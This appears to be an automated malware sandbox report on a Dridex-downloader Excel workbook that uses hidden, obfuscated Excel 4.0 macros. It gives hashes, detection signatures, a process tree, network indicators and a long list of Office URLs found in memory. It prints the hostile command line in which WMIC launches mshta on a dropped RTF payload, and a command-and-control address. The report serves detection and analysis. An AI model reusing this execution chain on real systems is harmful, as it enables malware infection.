Loading ...

Play interactive tourEdit tour

Windows Analysis Report request-0132311.xlsb

Overview

General Information

Sample Name:request-0132311.xlsb
Analysis ID:528517
MD5:1479f6bfc2c47932d8eee6cf4db5c7f4
SHA1:7594bd2fb1fa9005662ece3c490fe80d28463e2c
SHA256:38e36a6b7bf101f5a8ddfb13756b8975413c91bad1828f83258afa6e564f1c32
Tags:Dridexxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Found malicious Excel 4.0 Macro
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Sample execution stops while process was sleeping (likely an evasion)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6280 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 6188 cmdline: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 4988 cmdline: mshta C:\ProgramData\vULADISfrveNTj.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\vULADISfrveNTj.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6280, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf", ProcessId: 6188
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6280, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf", ProcessId: 6188

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
      Source: global trafficTCP traffic: 192.168.2.5:49781 -> 136.144.181.174:8080
      Source: global trafficTCP traffic: 192.168.2.5:49781 -> 136.144.181.174:8080
      Source: Joe Sandbox ViewIP Address: 136.144.181.174 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.aadrm.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.aadrm.com/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.cortana.ai
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.office.net
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.onedrive.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://augloop.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://cdn.entity.
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://clients.config.office.net/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://config.edge.skype.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://cortana.ai
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://cortana.ai/api
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://cr.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://dev.cortana.ai
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://devnull.onenote.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://directory.services.
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://graph.windows.net
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://graph.windows.net/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://lifecycle.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://login.windows.local
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://management.azure.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://management.azure.com/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://messaging.office.com/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://ncus.contentsync.
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://officeapps.live.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://onedrive.live.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://osi.office.net
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://outlook.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://outlook.office.com/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://outlook.office365.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://outlook.office365.com/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://roaming.edog.
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://settings.outlook.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://staging.cortana.ai
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://tasks.office.com
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
